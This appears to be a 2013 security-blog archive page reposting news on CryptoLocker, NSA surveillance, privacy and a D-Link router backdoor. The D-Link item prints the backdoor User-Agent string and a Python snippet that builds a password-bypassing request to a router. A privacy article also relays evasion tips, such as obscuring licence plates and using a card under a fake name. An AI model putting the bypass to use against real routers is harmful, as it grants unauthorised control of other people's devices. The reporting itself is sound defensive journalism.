Monthly Archives: October 2013

Upfront security better and cheaper, says expert

Businesses can increase data protection and decrease costs by baking in information security from the start of any IT project, says Jon McCoy, founder of application security firm DigitalBodyGuard.

“Security needs to start when businesses set the goals and plan the day-to-day workflow a new IT system will accomplish,” he told Computer Weekly.

McCoy, a .Net software engineer, would like to see executives consider information security even earlier when they plan the business direction, products and infrastructure.

“A dollar spent on the planning stage can be worth ten, a hundred or even a thousand times that post deployment, which is a good business reason for investing in security early,” he said.

Security failure

Time to market is often cited as a reason security is overlooked or added only later, but McCoy points out that developing something securely from the start rarely takes any longer.

“It is usually nice to have longer for testing, but a secure infrastructure can be developed for the same cost in the same time as an insecure infrastructure,” he said.

According to McCoy, small, seemingly unimportant choices at key points in the design of an application, network or business process can have far-reaching effects on the security of the whole organisation.

A common example, he said, is to demand long, complicated, frequently-changing passwords, which can create other security issues more critical than those they are aimed at solving.

This approach to security can put users and security teams at odds and lead to users writing down passwords and finding workarounds.

“A better approach is to find a model that works for users in the real world, such as using a YubiKey device that automatically generates and rotates complex passwords for users,” said McCoy.

Security should be easy and transparent, he said, not something that frustrates users by slowing down their work.

One of the most common security failures in organisations is that they try to solve each problem identified by security analysis tools, rather than looking for and solving the root causes, said McCoy.

Completely ignoring the reports generated by security analysis tools is equally problematic, he said.

Security success

On the other hand, companies that are doing security well typically conduct regular security reviews, include security at the planning stages of all IT projects, and do iterative security testing.

However, McCoy cautions against letting security lead the organisation. “There are instances where I have seen this go very wrong because security does not have the market knowledge,” he said.

A secure infrastructure can be developed for the same cost in the same time as an insecure infrastructure

Jon McCoy, DigitalBodyGuard

McCoy said he has seen the most success where a senior executive is a proponent of security and introduces security to each of the business teams, appointing a security representative in each.

“Where security is introduced slowly in this way, it can change the culture of the organisation and stop being an external force to the point that all teams have an internal security skillset or concern,” he said.

Security training for developers

McCoy is to discuss such indicators of security success or failure, and other key security issues, in a free seminar on the security lifecycle at Level 39, London, on 17 October 2013.

The seminar is in collaboration with the Norwegian Developers Conference (NDC), which will hold its first .Net and agile development event in London from 4-6 December 2013 at the ExCeL convention centre.

“A key takeaway for the seminar will be that introducing security as early as possible into the development lifecycle will deliver big returns,” said McCoy.

He believes that by reducing the gulf that exists between the security community and developers, businesses will reap rewards in terms of improved data protection.

“Training developers in basic security can have a huge impact because while security experts come and go, developers are the people who construct systems day to day and are always there,” he said.


Via: computerweekly

CryptoLocker ransomware – see how it works, learn about prevention, cleanup and recovery

This article explains how the CryptoLocker ransomware works, including a short video showing it in action.

The article tells you about prevention, cleanup, and recovery.

It also explains how to improve your security against this sort of threat in future.


CryptoLocker, detected by Sophos as Troj/Ransom-ACP, is a malicious program known as ransomware.

Some ransomware just freezes your computer and asks you to pay a fee. (These threats can usually be unlocked without paying up, using a decent anti-virus program as a recovery tool.)

CryptoLocker is different: your computer and software keep on working, but your personal files, such as documents, spreadsheets and images, are encrypted.

The criminals retain the only copy of the decryption key on their server – it is not saved on your computer, so you cannot unlock your files without their assistance.

They then give you a short time (e.g. 72 hours, or three days) to pay them for the key.

The decryption key is unique to your computer, so you can’t just take someone else’s key to unscramble your files.
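To see why the files are unrecoverable, it helps to sketch the idea of encryption with a key held only by the attacker. The following is a toy illustration in Python, not CryptoLocker’s actual scheme (the real malware is reported to use strong RSA and AES encryption, while this sketch uses a deliberately simple SHA-256 counter-mode keystream):

```python
import hashlib
import secrets

def keystream(key: bytes, length: int) -> bytes:
    """Toy stream cipher: SHA-256 in counter mode. Illustration only."""
    blocks = []
    counter = 0
    while sum(len(b) for b in blocks) < length:
        blocks.append(hashlib.sha256(key + counter.to_bytes(8, "big")).digest())
        counter += 1
    return b"".join(blocks)[:length]

def xor_crypt(key: bytes, data: bytes) -> bytes:
    """XOR the data with the keystream; the same call encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

# The "server side" (the criminals) generates and keeps the only copy of the key.
server_side_key = secrets.token_bytes(32)

document = b"Quarterly accounts: confidential"
scrambled = xor_crypt(server_side_key, document)

# On the victim's machine, only `scrambled` remains. Without the 32-byte key,
# which never touches the victim's disk, there is nothing to recover from.
recovered = xor_crypt(server_side_key, scrambled)
assert recovered == document
```

The point of the sketch is the final step: everything needed to decrypt lives on the criminals’ side, so no amount of scanning or cleanup on the victim’s machine can bring the plaintext back.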

The fee is $300 or EUR300, paid by MoneyPak; or BTC2 (two Bitcoins, currently about $280).

To understand how CryptoLocker goes about its dirty work, please see our step-by-step description.

→ Our detailed article is suitable for non-technical readers. It covers: how the malware “calls home” to the crooks, how the encryption is done, which file types get scrambled, and what you see when the demand appears. You may want to keep the article open in another tab or window to refer to while you read this page.


CryptoLocker reveals itself only after it has scrambled your files, which it does only if it is online and has already identified you and your computer to the encryption server run by the criminals.

We therefore recommend that you don’t try the malware out yourself, even if you have a sample and a computer you don’t care about, because you can’t easily test it without letting your computer converse with the crooks.

However, we know you would love to see what it does and how it works, so here is a video made by our friend and colleague Mark Rickus of Sophos Support.

We recommend this video because Mark has pitched it perfectly: he doesn’t rush; he doesn’t talk down to you; he lets the facts speak for themselves; and he brings an air of calm authority with just a touch of wry humour to what is a rather serious subject:

→ Can’t see the details in the video on this page? Watch directly from YouTube.


You can use the free Sophos Virus Removal Tool (VRT).

This program isn’t a replacement for your existing security software, because it doesn’t provide active protection (also known as on-access or real-time scanning), but that means it can co-exist with any active software you already have installed.

The Virus Removal Tool will load, update itself, and scan memory, in case you have malware that is already active.

Once it has checked for running malware, and got rid of it, then it scans your hard disk.

If it finds any malicious files, you can click a button to clean them up.

If CryptoLocker is running and has already popped up its payment demand page, you can still remove it and clean up, but the Virus Removal Tool cannot decrypt your scrambled files – the contents are unrecoverable without the key, so you may as well delete them.

Even if you don’t have CryptoLocker, it is well worth scanning your computer for malware.

The criminals are known to be using existing malware infections as “backdoors” to copy CryptoLocker onto victims’ computers.

We assume their reasoning is that if you have existing, older malware that you haven’t spotted yet, you probably won’t spot CryptoLocker either, and you probably won’t have a backup – and that means they’re more likely to be able to squeeze you for money later on.


Fortunately, CryptoLocker is not a virus (self-replicating malware), so it doesn’t spread across your network by itself.

But it can affect your network, because it searches extensively for files to encrypt.

Remember that malware generally runs with the same permissions and powers as any program you choose to launch deliberately.

So, any file, on any drive letter or network share, that you can locate and access with a program such as Windows Explorer can be located and accessed by CryptoLocker.

That includes USB drives, network file shares, and even cloud storage folders that are made to appear as drive letters by special software drivers.

A Naked Security reader just commented that from a single infected computer, he was “faced with 14,786 encrypted files over local and mapped network drives.”

So, if you haven’t reviewed the security settings on your network shares lately, this would be a good time to do so.

If you don’t need write access, make files and folders read only.


We’ll follow the police’s advice here, and recommend that you do not pay up.

This sort of extortion – Demanding Money with Menaces, as a court would call it – is a serious crime.

Even though CryptoLocker uses payment methods (MoneyPak, Bitcoin) that keep you and the crooks at arm’s length, you are dealing with outright criminals here.

Of course, since we don’t have 14,786 encrypted files, like the reader we mentioned above, we acknowledge that it may be easier for us to say, “Don’t pay” than it is for you to give up on your data.

Obviously, we can’t advise you on how likely it is that you will get your data back if you do decide to pay.


Is CryptoLocker the worst malware ever? We don’t think so, although that is cold comfort to those who have lost data this time round.

Losing files completely is a terrible blow, but you can lose data in lots of other ways: a dropped hard disk, a stolen laptop or just plain old electronic failure.

The silver lining with CryptoLocker is that the criminals don’t actually take your data – they just leave it locked up where it was before, and offer to sell you the key.

In many ways, malware that isn’t so obvious and aggressive, but which steals your files, or monitors your keyboard while you login to your bank, or takes snapshots of your screen while you’re filling out your tax return, can be much worse.

In those cases, the crooks end up with their own duplicate copies of your data, passwords and digital identity.

If you have a recent backup, you can recover from CryptoLocker with almost no consequences except the time lost restoring your files.

Identity theft, however, can be a lot harder to recover from – not least because you have to realise that it’s even happened before you can react.

Even if all you have on your computer is zombie malware of the sort that crooks use to send spam, doing nothing about it hurts everyone around you, and imposes a collective cost on all of us.

That’s why we are urging you to DO THESE 3 security steps, and TRY THESE 4 free tools, even if you haven’t been hit by CryptoLocker.


Here are five “top tips” for keeping safe against malware in general, and cyberblackmailers in particular:

  • Keep regular backups of your important files. If you can, store your backups offline, for example in a safe-deposit box, where they can’t be affected in the event of an attack on your active files. Your backups will be rendered useless if they are scrambled by CryptoLocker along with the primary copies of the files.
  • Use an anti-virus, and keep it up to date. As far as we can see, many of the current victims of CryptoLocker were already infected with malware that they could have removed some time ago, thus preventing not only the CryptoLocker attack, but also any of the damage done by that earlier malware.
  • Keep your operating system and software up to date with patches. This lessens the chance of malware sneaking onto your computer unnoticed through security holes. The CryptoLocker authors didn’t need to use fancy intrusion techniques in their malware because they used other malware, which had already broken in, to open the door for them.
  • Review the access control settings on any network shares you have, whether at home or at work. Don’t grant yourself or anyone else write access to files that you only need to read. Don’t grant yourself any access at all to files that you don’t need to see – that stops malware seeing and stealing them, too.
  • Don’t give administrative privileges to your user accounts. Privileged accounts can “reach out” much further and more destructively both on your own hard disk and across the network. Malware that runs as administrator can do much more damage, and be much harder to get rid of, than malware running as a regular user.


Via: sophos

On Macs, Cross-Platform Threats, and Managing Multiple Devices

Apple will once again take center stage on October 22, when they (probably) unveil new versions of the iPad, iPad mini, MacBook Pro, and the Mac Pro. We will be once again on the lookout for scams and malware that will exploit this event, as they did with the iPhone 5s.

The threats mentioned above also reiterate what we’ve said before: Mac users are not immune to cybercrime. In today’s landscape where information can be accessed practically anywhere, threats to data are no longer dependent on the type of device or operating system one is using.

One example is the continued—and even growing—exploitation of vulnerabilities found in cross-platform applications like Adobe or Java, which had several bouts of zero-day incidents during the first quarter of this year. For end users who have access to both a PC and a Mac, protecting themselves from these exploits would mean, at the very least, installing security updates for each of these platforms as soon as they become available.

For enterprises, this task is compounded ten- or even hundred-fold, especially because they have to manage not just PCs and Macs, but also Android, iOS, and other endpoints that connect to their networks. With consumerization and bring-your-own device trends happening, the endpoint “ecosystem” is getting fragmented further.

This mixed bag of devices and OSes can pose several challenges for IT administrators. Controlling these devices and maintaining visibility over events is more difficult. Again, we are not just talking about PC and Mac threats here: our researchers have so far uncovered threats that affect both desktop and mobile platforms.

Another challenge is the deployment of preventive measures like patches and security updates. As such, organizations should have an endpoint strategy composed not only of the appropriate solutions and technologies, but also of well-thought-out data security policies. More information can be found in our latest Security In Context Primer: Managing Multiple Devices: Integrated Defense Against Cross-Platform Threats.


Via: trendmicro

How to remove your face from Google’s upcoming Shared Endorsement ads

Some Google users who don’t want their faces used to pimp bagel shops (or spas, or Nexus 7, or whatever ads Google can squeeze money out of) are replacing their photos with one of Executive Chairman Eric Schmidt.

The backlash – the scope of which could be tiny, for all I know, given that news of it apparently comes solely from a retweet by Daring Fireball’s John Gruber – is in reaction to Google’s announcement that it will grab users’ profile pictures, names, photos and product reviews harvested from Google+ and plug them into advertisements.

Google is calling the planned advertisements Shared Endorsements.

Google announced new Terms of Service that will go live on 11 November which explain that it will use content in this way.

On top of our images, Google will also display reviews of restaurants, shops and products, as well as songs and other content reviewed or bought on the Google Play store, when our friends and connections search on Google.

Of course, the move is a no-brainer for Google.

The company’s revenues come almost entirely – reportedly 96% in 2012 and 97% in 2011 – from advertising.

Google doesn’t make any bones about it. The company said in an annual report from 2012, “We generate revenue primarily by delivering relevant, cost-effective online advertising.”

The move is identical to Facebook’s Sponsored Stories boondoggle, with one exception: It’s looking to not be a boondoggle. Google is doing it right.

Namely, Google is offering users a way to opt out, and that will in all likelihood sidestep the legal swamp that Facebook fell into over Sponsored Stories.

For its part, Facebook paid out $20 million in a personal ads class action lawsuit settlement in August 2013, and another $10 million to settle a lawsuit in 2012.

Antagonising Google by swapping a profile photo for Schmidt’s may feel like fun, in-your-FACE-Google! hijinks, but the chances that Google will roll back the tasty revenue source are approximately, in rounded percentage points, “hahahahahaha!”

It’s likely that the only way to opt out is to opt out.

Here’s how to opt out of Google’s Shared Endorsements:

  1. Sign into your Google account. If you’re in the process of setting up an account, finish that first, then come back.
  2. Go to the Shared Endorsements setting page. If you’re not already a Google+ user, you will be asked to upgrade your account.
  3. Toward the bottom, you’ll see a checkbox that says “Based on my activity, Google may show my name and profile photo in shared endorsements that appear in ads.”
  4. Uncheck it and click Save to opt out of the new program.

Google will grab at your ankle to try to drag you back into advertising land, but one extra click saying “Yes, I do, in fact, want to unpeel my mug from your advertisements” won’t kill us, I suppose.

Many readers have asked if this will impact users with Google Accounts who haven’t enabled Google+. Are they already opted out, or do they have to climb further into bed with Google and enable a Google+ account just to opt out? Google’s information is ambiguous on this point.


Via: nakedsecurity

Think You Can Live Offline Without Being Tracked? Here’s What It Takes

We asked the most privacy-aware people we could find what it would take to go off the radar. Hint: You’re going to need to do more than throw away your laptop.


Nico Sell, the cofounder of a secure communication app called Wickr, has appeared on television twice. Both times, she wore sunglasses to prevent viewers from getting a full picture of what she looks like.

Sell, also an organizer of the hacker conference Def Con, places herself in the top 1% of the “super paranoid.” She doesn’t have a Facebook account. She keeps the device that pays her tolls in a transmission-proof envelope when it’s not in use. And she assumes that every phone call she makes and every email she sends will be searchable by the general public at some point in the future.

Many of her friends once considered her habits to be of the tin-foil-hat-wearing variety. But with this summer’s revelations of the NSA’s broad surveillance program, they’re starting to look a little more logical. “For the last couple of months,” Sell says, “My friends that are not in the security industry come up to me, and I hear this all the time, ‘You were right.’ ”

But even as more people become aware they are being tracked throughout their daily lives, few understand to what extent. In a recent Pew Internet study, 37% of respondents said they thought it was possible to be completely anonymous online. From experts like Sell, you’ll get a different range of answers about whether it’s possible to live without any data trail: “100% no,” she says.

The people who have actually attempted to live without being tracked–most often due to a safety threat–will tell you that security cameras are just about everywhere, RFID tags seem to be in everything, and almost any movement results in becoming part of a database. “It’s basically impossible for you and I to decide, as of tomorrow, I’m going to remain off the radar and to survive for a month or 12 months,” says Gunter Ollmann, the CTO of security firm IOActive, who in his former work with law enforcement had several coworkers who dedicated themselves to remaining anonymous for the safety of their families. “The amount of prep work you have to do in order to stay off the radar involves years of investment leading up to that.”

Fast Company interviewed the most tracking-conscious people we could find about their strategies for staying anonymous to different degrees. Here are just a handful of daily, offline tasks that get more complicated if you’re avoiding surveillance.

1. Getting Places

A few years ago, a man who goes by the Internet handle “Puking Monkey” noticed devices reading his toll pass in places where there weren’t any tolls. He assumed that they were being used to track drivers’ movements. “People would say, ‘Well you don’t know that, because it doesn’t tell you when it tracks you,'” he tells Fast Company. “I said, ‘Okay, I’ll go prove it.’ ”

He rigged his pass to make a mooing cow noise every time a device read his toll payment tag. And sure enough, it went off in front of Macy’s, near Times Square, and in several other places where there was no tollbooth in sight.

It turns out the city tracks toll passes in order to obtain real-time traffic information, a benign enough intention. But what worries people like Puking Monkey about being tracked is rarely a database’s intended purpose. It’s that someone with access to the database will misuse it, like when NSA employees spied on love interests, or when a U.K. immigration officer put his wife on a list of terrorist suspects in order to prevent her from flying into the country. Or that it will be used for a purpose other than the one it was built for, like when social security numbers were issued for retirement savings and then expanded to become universal identifiers. Or, most likely, that it will be stolen, like the many times the hacker group Anonymous has gained access to someone’s personal data and posted it online for public viewing. By one security company’s count, in 2012 there were 2,644 reported data breaches involving 267 million records.

In order to stop his toll pass from being tracked, Puking Monkey keeps it sealed in the foil bag it came in when he’s not driving through a toll. That only stops that data trail (minus toll points). Automatic license plate readers, often mounted to a police car or street sign, are also logging data about where cars appear. They typically take photos of every license plate that passes them and often these photos remain stored in a database for years. Sometimes they are linked with other databases to help solve crimes.

Puking Monkey avoids license-plate readers by keeping his old, non-reflective license plate, which is more difficult to read than newer, reflective models. Others who share his concerns salt their license plates, add bumper guards or otherwise obscure the writing – say by driving with the hatch down or driving with a trailer hitch attached – in order to avoid being tracked.

But that still doesn’t account for the tracking devices attached to the car itself. To identify tires, which can come in handy if they’re recalled, tire manufacturers insert an RFID tag with a unique code that can be read from about 20 feet away by an RFID reader. “I have no way to know if it’s actually being tracked, but there are unique numbers in those tires that could be used that way,” Puking Monkey says.

He uses a camera flash to zap his tires with enough energy to destroy the chips.

2. Buying things

Depending on your level of concern, there are several ways to produce less data exhaust when making purchases. None of the privacy experts who I spoke with sign up for loyalty cards, for instance. “It’s the link between your home address, what you’re purchasing, age, your movements around the country, when you’re shopping in different locations, that is tied to purchases you’re making in-store,” Ollmann says. In a recently publicized example, Target used data collected from loyalty cards to deduce when its customers were pregnant–in some cases, before they had shared the news with their families.

Tom Ritter, a principal security consultant at iSEC Partners, has come up with a creative way to subvert loyalty tracking without giving up discounts. When he sees someone has a card on their key chain, he asks if he can take a photo of the bar code to use with his own purchases. They get extra points, and he gets discounts without giving up any of his privacy.

What you buy can paint a pretty good picture of what you’re doing, and many people aren’t willing to leave that information in a credit card company’s database either. Adam Harvey, an artist who makes anti-surveillance gear, puts all of his purchases on a credit card registered under a fake name. Then he uses the credit card in his actual name to pay the bill (Update: Harvey clarified that this is a technique he heard about from Julia Angwin, who is writing a book about surveillance). Ollmann buys prepaid gift cards with no attribution back to him to do his online shopping.

The most intense privacy seekers have a strict cash-only policy–which can mean they need to get paid in cash. At Ollmann’s old law enforcement job, one employee didn’t get paid, but vaguely “traded his services for other services.”

“A barter system starts to appear if you want to live without being tracked,” Ollmann says.

3. Having Friends

Friends can be an impediment to a life off the radar. For one, they probably think they’re doing you a favor when they invite you to a party using Evite, add you to LinkedIn or Facebook, or keep your information in a contact book that they sync with their computer.

But from your perspective, as someone trying to remain as untraceable as possible, they are selling you out. “Basically what they’ve done is uploaded all of my contact information and connected it to them,” Sell says.

Same goes for photos, and their geolocation metadata, when they’re added to social networking sites. Sell, with her sunglasses, is not alone in being concerned about putting her appearance online. At some security events, where there are often speakers and attendees with reasons to keep off the radar, organizers distribute name tags with different color stickers. The stickers indicate whether each attendee is okay with having his or her photo taken.

Sure, it seems paranoid today. But Facebook and Twitter already run photos posted on their sites through a Microsoft-developed system called PhotoDNA in order to flag those who match known child pornography images. Most would not argue with the intention to find and prosecute child pornographers, though it’s not difficult for privacy activists to imagine how the same technology could be expanded to other crimes. “Every time you upload a photograph to Facebook or put one on Twitter for that matter you are now ratting out anybody in that frame to any police agency in the world that’s looking for them,” digital privacy advocate Eben Moglen told BetaBeat last year during a rant against one of its reporters. “Some police agencies in the world are evil. That’s a pretty serious thing you’ve just done.”

Ritter says he (not his company) personally thinks someone will build a facial recognition algorithm to scan the Internet within the next 10 years. “I can just imagine them opening it up where you would submit a Facebook photo of your friend, and it would show all the images that match it,” he says. “We have the algorithms, we know how to crawl the Internet. It’s just a matter of putting the two together and getting a budget.”

4. Just About Everything Else

It’s almost impossible to think of all the data you create on a daily basis. Even something as simple as using electricity is creating data about your habits. It’s more than whether or not you turned the lights on–it’s how many people are in your house and when you’re usually around.

RFID tags aren’t just in tires, they’re in your clothing, your tap-to-pay credit cards, and your dry cleaning. Ollmann zaps his T-shirts in the microwave. Others carry an RFID-blocking wallet to avoid having their RFID-enabled cards read when they’re not making a purchase.

Maybe you’ve thought about the cameras that stores use to track customer movements. But cameras are also in your television, in your computer, and on the front of your phone. Earlier this year, security experts discovered a way to hack into Samsung Smart TVs and surreptitiously turn on the built-in camera, allowing anyone who exploited the security hole to watch you as you watched TV. Though the vulnerability has since been fixed, it demonstrated that the security of connected objects isn’t guaranteed. Sell responded by covering all of the cameras in her household electronics with masking tape.

What makes totally avoiding surveillance really difficult is that even if you’ve thought of everything–to the point where you’re covering your tablet’s front-facing camera with masking tape–you can always think of more ways your data could be misused. Because you’re constantly trying to prevent something that hasn’t necessarily happened yet, the precautions you can take are just as endless.

Sometimes, as in the case of the NSA scandal, you find out that they were warranted. Most of the time, you never really know.

Ritter, for instance, recently met an insurance executive who always pays for meals with cash because he believes some day that data will be linked to his coverage. “I’m not saying this is a definite thing that happens,” Ritter says, “but I don’t see any definite reason why it couldn’t.”

“And that kind of concerns me, ya know?”

Via: fastcompany

To Get Around US Law, The NSA Collects Email Address Books And Chat Buddy Lists From Foreign Locations

The Washington Post broke news this afternoon that the National Security Agency (NSA) is collecting huge numbers of email address books and chat buddy lists for both foreign individuals and United States citizens.

It appears that the NSA lacks Congressional authority to collect buddy lists and address book information in the way that it currently does. As the Post rightly points out, address book data can include physical addresses, very personal information, and more.

To get around that lack of a mandate, the NSA has agreements with non-U.S. telcos and works with other, non-U.S. intelligence groups. So to get its hands on even more information, the NSA avoids the constraints of its oversight and legal boundaries by going to alternative sources of the data that it wants.

That matters because the rules of other countries for tracking the communication of United States citizens are more lax. Recall that the NSA is in some ways slowed from collecting information on citizens of the United States, but not those of other countries.

So, if the NSA is willing to accept data from foreign intelligence agencies that it is not able to collect in this case, why not in other cases as well?

If the NSA won’t respect the constraints that are put in place on its actions for a reason, and will instead shirk its responsibilities and find a way to get all the data it could ever desire, then we have even less reason to trust its constant petitions that it follows the law, and is the only thing keeping the United States safe from conflagration.

The Post continues: “When information passes through ‘the overseas collection apparatus,’ [an intelligence office] added, ‘the assumption is you’re not a U.S. person.'” This means that when the NSA sweeps up contact data, buddy lists, and address sets from overseas, the same rules that keep it from collecting information on United States citizens aren’t likely in play. Minimization, it would seem, would be minimal.

The phone metadata program knows who you called, when, and for how long. PRISM can force your private information out of major Internet companies. XKeyscore can read your email and track most of what you do online. And the above program circumvents Congressional oversight by collecting more data on U.S. citizens simply by executing that collection abroad.

How private are you feeling?

Facebook provided TechCrunch with the following statement:

“As we have said many times, we believe that while governments have an important responsibility to keep people safe, it is possible to do so while also being transparent. We strongly encourage all governments to provide greater transparency about their efforts aimed at keeping the public safe, and we will continue to be aggressive advocates for greater disclosure.”

Microsoft repeated to TechCrunch what it had told the Washington Post, that it “does not provide any government with direct or unfettered access to our customers’ data” and that if the above revelations are true, then the company would “have significant concerns.”


Via: techcrunch

D-Link router flaw lets anyone login through “Joel’s Backdoor”

Members of the embedded systems hacker collective /dev/ttys0 spend their time playing around with devices like home routers and set-top boxes.

They like to see what interesting facts these devices’ proprietary hardware and firmware might reveal.

Part of the hackers’ motivation is to get the devices to do things that the vendor may not have bothered to implement, thus improving their functionality.

And why not, if it’s your device that you bought outright with your own money?

But hacking on embedded systems can also help to improve security, or at least help others to avoid insecurity, by revealing and helping to fix potentially exploitable vulnerabilities that might otherwise lie dormant for years.

Indeed, in recent times, we’ve written repeatedly about security problems in consumer embedded devices.

We had a botnet that unlawfully mapped the internet by jumping around from router to router and taking measurements without permission.

We described a flaw that allowed attackers to force your router to open up its administration interface to the internet, something you would never normally do.

We’ve talked about how the Wi-Fi Protected Setup (WPS) feature, intended to improve security, typically makes your wireless access point easier to break into.

And we wrote up a widespread flaw in the way that many routers implement a popular system known as Universal Plug and Play (UPnP).

UPnP is a protocol that is supposed to make it easier to configure your system correctly, but may instead leave you open to the world.

You can probably guess where this is going: another security hole.

This one was found in the firmware of a number of D-Link routers – the author suggests at least the models DIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604+ and TM-G5240.

I’ll skip the details – you should read the original author’s analysis, since he did the hard yards to identify the flaw – and cut to the almost unbelievable conclusion.

If you browse to any page on the administration interface with your browser’s User Agent (UA) string set to a peculiar, hard-wired value, the router doesn’t bother to ask for a password.

→ Browsers send a User Agent string in the headers of every HTTP request. This is a handy, if clumsy, way to help web servers cater to the programmatic peccadillos of each browser.

Let’s be perfectly clear what this means: these routers have a hardwired master key that lets anyone in through an unsupervised back door.

“What is this string?” I hear you ask.

You will laugh: it is xmlset_roodkcableoj28840ybtide.


Ignore the xmlset, which probably just means “Configure Extensible Markup Language (XML) setting.”

Flip round the part after the underscore, in reversible-rock-music style, to get the hidden message:

Edit by 04882 Joel: Backdoor.
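The reversal takes only a couple of lines of Python to verify (the string below is the published backdoor value):

```python
# The User-Agent string found hard-wired in the affected D-Link firmware.
BACKDOOR_UA = "xmlset_roodkcableoj28840ybtide"

# Strip the "xmlset_" prefix and reverse the remainder to expose the message.
hidden = BACKDOOR_UA.split("_", 1)[1][::-1]
print(hidden)  # editby04882joelbackdoor
```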

Can you believe it?

If you tell your browser to identify itself as Joel’s backdoor, instead of (say) as Mozilla/5.0 AppleWebKit/536.30.1 Version/6.0.5, you’re in without authentication.
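In practical terms, that amounts to nothing more than setting one HTTP header. The sketch below, written against Python’s standard library with a hypothetical LAN address standing in for a real router, shows how such a request would be constructed; it builds the request but deliberately does not send it:

```python
import urllib.request

BACKDOOR_UA = "xmlset_roodkcableoj28840ybtide"
ROUTER_URL = "http://192.168.0.1/"  # hypothetical LAN address of an affected router

# Build a request whose User-Agent is the hard-wired backdoor value.
# On vulnerable firmware, the admin pages respond without asking for a password.
req = urllib.request.Request(ROUTER_URL, headers={"User-Agent": BACKDOOR_UA})

print(req.get_header("User-agent"))  # xmlset_roodkcableoj28840ybtide
# urllib.request.urlopen(req) would then fetch the admin page; not executed here.
```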

Fortunately, the administration interface isn’t accessible from the internet-facing port of these routers by default, which limits the exploitability of this vulnerability.

(If you have one of these models, check right now that you can’t access the management interface directly from the outside!)

This is a shabby feature to put in any product, let alone in a router that aims to provide at least some additional security.

It raises the question, “Why is Joel’s code there at all?”

A good guess is that the backdoor probably wasn’t put there to enable illicit surveillance, or for any other nefarious purpose, but as a favour to special-purpose D-Link software, so it could make configuration tweaks without needing a password.

Or it was put in to save time in development and debugging, but never taken out again.

Sadly for the world, though, 04882 Joel made it easy for anyone at all to make configuration tweaks without needing a password.

For the second time this year, we’d therefore like to say, “Hardwired passwords were a design blunder back in the 1970s. In the 2010s, they are simply unacceptable, so never succumb to the temptation to include them in your code.”


Via: sophos

Android Fingerprint Sensors Coming Soon

A coming web standard being pursued by the FIDO Alliance seeks to enable much wider use of biometric sensors to access accounts. FIDO should reduce, if not eliminate altogether, the use of passwords to access accounts on mobile devices. The initial FIDO-equipped Android devices are on track to roll out in early 2014.


Michael Barrett cringes every time he has to enter a password on his smartphone. But six months from now, Barrett says, he will be able to choose from the latest Android models that will come equipped with a biometric sensor capable of letting him swipe his fingerprint to access a wide range of his online accounts.

That’s the scenario being proactively pursued by the FIDO Alliance, a group of 48 tech companies, led by PayPal and Lenovo, hustling to implement a milestone technical standard.

“The intention of FIDO is absolutely that it will allow consumers to have access to mobile services that they can use with very low friction, while keeping good security,” says Barrett, president of the FIDO Alliance. “That’s explicitly what we want to build.”

As FIDO gains traction, it should radically change mobile computing, much as the Wi-Fi standard did.

FIDO should reduce, if not eliminate altogether, the use of passwords to access accounts on mobile devices.

Apple’s latest iPhone model features a much-ballyhooed fingerprint sensor, called Touch ID, that can be used to lock and unlock the phone, as well as authenticate the user to purchase digital media on iTunes.

Touch ID is not FIDO compliant.

Apple spokeswoman Natalie Kerris declined to comment.

However, Barrett says Touch ID could easily be adapted to FIDO. “Our view is that it’s possible Apple might choose to start using FIDO, but that’s probably a couple of years out.”

Meanwhile, Barrett is on a mission to get other hardware makers and online companies to arrive at a consensus on common rules of the road for enabling consumers to use their computing devices — be it a smartphone, touch tablet, laptop or desktop PC — more centrally in the authentication process.

Biometric sensing technology is well understood. Yet, passwords — and poor password habits — remain central to accessing online accounts. This has made it all too easy for cybercriminals.

“We make tradeoffs to balance security with convenience,” says Manoj Nair, general manager of identity trust management at RSA.

“The next generation of identity protection will allow us to be more convenient and secure at the same time,” Nair says.

That’s where FIDO comes in. The alliance is hashing out an open standard that any company can adopt. So a music service or online banking site will be able to recognize the unique characteristics stored on a PC’s security chip or a smartphone’s biometric sensor, as long as all parties adhere to FIDO.
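FIDO’s protocols are built around challenge-response authentication with device-held credentials, rather than a shared password that must be stored by every service. The Python sketch below illustrates only that shape: real FIDO uses public-key signatures, whereas this toy substitutes an HMAC so it runs with the standard library alone, and every name in it is invented for illustration:

```python
import hashlib
import hmac
import os

# Registration: the device creates a secret that never leaves it.
# (Real FIDO devices generate a public/private key pair and register only the
# public key with the server; a shared HMAC key stands in here for simplicity.)
device_secret = os.urandom(32)
server_copy = device_secret  # stand-in for the registered public key

# Authentication: the server sends a fresh random challenge...
challenge = os.urandom(16)

# ...the device signs it after a local check (e.g. a fingerprint swipe)...
response = hmac.new(device_secret, challenge, hashlib.sha256).digest()

# ...and the server verifies, with no password ever crossing the wire.
expected = hmac.new(server_copy, challenge, hashlib.sha256).digest()
print(hmac.compare_digest(response, expected))  # True
```

Because the challenge is random every time, a captured response is useless for replay — a property no static password can offer.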

The alliance officially launched in February with a handful of founders and has grown rapidly.

The initial FIDO-equipped Android devices, along with an array of commercial services using the FIDO protocols, are on track to roll out in early 2014, Barrett says.

Via: enterprise-security-today

Skype under investigation over link to NSA

Internet-based calling service Skype is under investigation by Luxembourg’s data protection authorities over its involvement with the US National Security Agency’s Prism internet surveillance programme.

The Microsoft-owned company could potentially face criminal and administrative sanctions, including a ban on passing users’ communications covertly to the NSA, according to the Guardian.

Luxembourg’s data protection chief Gerard Lommel and Microsoft have both declined to comment, the paper said.

Skype is headquartered in Luxembourg and could face an additional fine if an investigation initiated by data protection authorities concludes that the data sharing violated the country’s data-protection laws.

The investigation was ordered after whistleblower Edward Snowden’s revelations about the Prism programme uncovered links between the NSA and Skype.

Documents leaked by Snowden indicate that the amount of Skype video call information passed to the NSA has trebled since Microsoft’s acquisition of the company in an $8.5bn deal in 2011.

In a statement to the Guardian, Skype said it believed that the world needed “a more open and public discussion” about the balance between privacy and security, but accused the US government of stifling the conversation.

“Microsoft believes the US constitution guarantees our freedom to share more information with the public, yet the government is stopping us,” a spokesperson for Skype said, referring to Microsoft’s legal battle to disclose more information about the number of government surveillance requests it receives.

Richard Anstey, CTO for Europe at business collaboration firm Intralinks said Prism is not exclusively a US problem.

“Even if companies were more paranoid about sharing information with US-based companies and opted for Germany, for example, the US government could still access it nine times out of ten,” he said.

Governments need to evaluate the criticality of data, said Anstey, rather than collecting information just in case they need it, and should not enforce their powers to do so unless there is an emergency.

“Businesses also need to be educated on calculating risk outcomes, from operational and commercial perspectives,” he said.

According to Anstey, there is no 0% risk option, and government surveillance is just one piece of a larger jigsaw.

